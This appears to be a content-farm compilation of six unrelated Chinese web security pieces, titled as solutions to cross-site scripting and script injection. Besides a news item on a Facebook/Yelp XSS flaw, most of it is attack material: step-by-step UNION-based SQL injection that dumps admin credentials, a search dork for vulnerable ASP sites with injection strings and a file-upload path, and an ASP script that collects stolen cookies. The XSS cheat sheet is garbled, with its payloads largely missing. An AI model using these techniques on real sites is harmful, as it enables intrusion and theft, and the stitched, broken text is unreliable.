跨站点脚本攻击 脚本注入 解决 方案

2024-11-28

跨站点脚本攻击 脚本注入 解决 方案(精选6篇)

1.跨站点脚本攻击 脚本注入 解决 方案 篇一

今年5月,Web安全咨询师George Deglin发现了一段成功实施了攻击的跨站脚本(XSS)代码,这段代码利用了Facebook颇有争议的即时个性化功能,该代码在Facebook所选中的测试即时个性化的3个网站之一――Yelp上运行。运行该代码段,Deglin不仅获得了与Yelp共享的Facebook上的个人档案信息,而且还截获了发送档案给Facebook好友的邮箱地址――这无论对于市场销售人员还是垃圾邮件发送者来说都是一座潜在的金矿。

就在Deglin发现的XSS漏洞被修补上之后没多久,另一个XSS漏洞又在Yelp上出现,搞得Facebook只好将该网站的即时个性化程序暂时挂起来。

XSS攻击并不新鲜,但是睡着社交媒体的兴起,又给了此类攻击一片新的用武之地。

XSS简单入门

最常见的XSS攻击方法就是利用邮件:犯罪分子在一个普通的URL网址中添加一些特殊字符,例如添加几个外文字符。这些字符会适时地告知运行事先制作好的脚本的Web服务器,举例来说,一个攻击者给你的网上银行的网址中添加了这样一个脚本,然后发邮件给你,

假如你相信这是来自你的网上银行的合法邮件,然后点击了邮件提供的链接地址,那么你的浏览器就会给那台Web服务器发送该脚本,这台服务器上所运行的恶意代码就会截获你的浏览器cookies和你的银行登录信息,转发给攻击者,后者便可登录进你的网上银行账号。

另一类XSS攻击会将恶意代码存放在一台Web服务器上。攻击者登录比如说一家电子商务网站,然后发送一条含有XSS跨站脚本的消息。数天之后,如果你登录了这家电子商务网站,阅读了这条不良消息,就会和前一类一样,该脚本盗取你的cookies和登录信息,并将其转发给犯罪分子,而他便可以冒充你了。

第三类XSS攻击是针对Web浏览器的。在这种情形中,攻击者会在你所访问的网站上放置一个带毒的Flash文件。当你的浏览器下载这段Flash视频的时候,该文件便会触发一个跨站脚本,攻击者便可掌控你的浏览器所浏览的页面元素。

Web 2.0和XSS

今天的很多网站在过滤常见的XSS供给方面都要比过去做得好,但是当两个内容过滤需求完全不同的网站彼此结成合作伙伴的时候,会发生什么情况呢?

2.xss跨站脚本攻击 篇二

(2)IMG标签XSS使用JavaScript命令

(3)IMG标签无分号无引号

(4)IMG标签大小写不敏感

(5)HTML编码(必须有分号)

(6)修正缺陷IMG标签

”>

(7)formCharCode标签(计算器)

(8)UTF-8的Unicode编码(计算器)

(9)7位的UTF-8的Unicode编码是没有分号的(计算器)

(10)十六进制编码也是没有分号(计算器)

(11)嵌入式标签,将Javascript分开

(12)嵌入式编码标签,将Javascript分开

(13)嵌入式换行符

(14)嵌入式回车

(15)嵌入式多行注入JavaScript,这是XSS极端的例子

(16)解决限制字符(要求同页面)

(17)空字符

perl -e ‘print “”;’ >out

(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用

perl -e ‘print “alert(”XSS”)”;’ >out

(19)Spaces和meta前的IMG标签

(20)Non-alpha-non-digit XSS

(21)Non-alpha-non-digit XSS to 2

(22)Non-alpha-non-digit XSS to 3

(23)双开括号

<

(24)无结束脚本标记(仅火狐等浏览器)

3.跨站点脚本攻击 脚本注入 解决 方案 篇三

全文

原文地址: www.tkbbs.com/Article/wlaq/hkgf/10/856.html

参考文章 用Union进行高效注入

事件起因是用 HDSI过程当中 的WEBSHELL管理 有一个网站 显示是 SQL 注入 于是感兴趣的那工具扫 当然 无法 扫到管理帐号 工具无效。。 哈哈 于是开始手工注射

注射地址为 :www.XXX.net/read.php?type=news&id=29

www.xxxx.net/read.php?type=news&id=29/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,6,7/**/from/**/admin

上面的字符的意思是 查询 ADMIN表的字段数目 可以逐个增加最终页面 不在提示出错可以看到 页面出现了 2 4和作者后面的3

说明程序调用了这几个字符 如图1

于是把上面的 2 3 4 分别替换成 count(id):查询有几个管理人员 min(id):管理人员帐号ID最小值 max(id):管理人员帐号ID最大值

成为下面的语句

www.xxxx.net/read.php?type=news&id=29/**/and/**/1=2/**/union/**/select/**/1,count(id),min(id),max

(id),5,6,7/**/from/**/admin

如图2

上面的 原来的 2的地方 显示 24的地方显示2 3的地方显示1 说明 管理人员ID最大的为2 ID最小的为1 总共两个管理人员

下面查询 他的管理ID叫什么 密码和 ID

usernamepassword id

把上面的 2 3 4 分别替换成usernamepassword id这个过程如果没爆出来 可以把 这几个字段换成其他的尝试

www.xxxx.net/read.php?type=news&id=29/**/and/**/1=2/**/union/**/select/**/1,username,password,1,5,6,7/**/from/**/admin

或 www.xxxx.net/read.php?type=news&id=29/**/and/**/1=2/**/union/**/select/**/1,username,password,2,5,6,7/**/from/**/admin

如图3

看见了吗管理者 ID 为1 帐号为 wnjy密码是 $1$BX$/.kw1RvBf/Un7c9heGMPb0

4.跨站点脚本攻击 脚本注入 解决 方案 篇四

百度关键字:inurl:pro_show.asp?showid=

注入前可以先判断一下字段数:www.xxx.com/pro_show.asp?showid=17 order by 28

注入语句:www.xxx.com/pro_show.asp?showid=17 and 1=1 union select 1,username,3,4,5,6,7,8,9,10,password,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from lei_admin

字段数自己判断,我试了2个网站都是28,至于密码有明文也有md5加密的,后台自找,

后台上传地址:admin/inc/upfile.htm 可直接上传asp文件

5.跨站点脚本攻击 脚本注入 解决 方案 篇五

文章出处: 原创

阅读次数: 371

发布日期: -12-8受影响版本:

启航文章管理系统目前所有版本

漏洞描述:

showerr.asp存在跨站脚本漏洞,恶意者可以构造有效连接非法获得远程用户cookie,

攻击方法:

www.target.com/showerr.asp?action=Err_info&ErrMsg=

www.target.com/showerr.asp?action=Err_info&ErrMsg=

其中“%2B”代表“+” ,

cookie.asp如下,即可收集cookie:

quote:

<%

Testfile=server.mappath(“info.txt”)

Msg=request.servervariables(“QUERY_STRING”)

Set fs=server.createobject(“scripting.filesystemobject”)

Set thisfile=fs.opentextfile(testfile,8,true,0)

Thidfile.writeline(“”&msg&“”)

Thisfile.close

Set fs=nothing

%>

厂商补丁:

启航文章管理系统

-----

6.有趣的百度杀毒频道跨站脚本安全 篇六

跨站之后,返回如下信息:

也没什么,就是告诉你百度杀毒频道使用的是Resin服务器平台,然而给你一个如何返回这样这样404页面的解决方案,以后也许可以用到,

有趣的百度杀毒频道跨站脚本安全

我一点都不知道。

shadu.baidu.com/xss.jsp?,变形一下:

shadu.baidu.com/.jsp ,可以很简短,不过不能利用常规加密方法如escape等伪造,因为.jsp前面应该必须是合法的文件名。遗憾的是,没发现注入点。真是小心翼翼的。我还以为我发现了什么。注入要看数据库的脸色,所以掌握各类主流数据库的相关知识很重要。顺便问一下,谁有耐心读完这段脚本?我看着头就晕了。

上一篇:中医医院评审暂行办法(征求意见稿)下一篇:刘长卿《江州重别薛六柳八二员外》翻译及赏析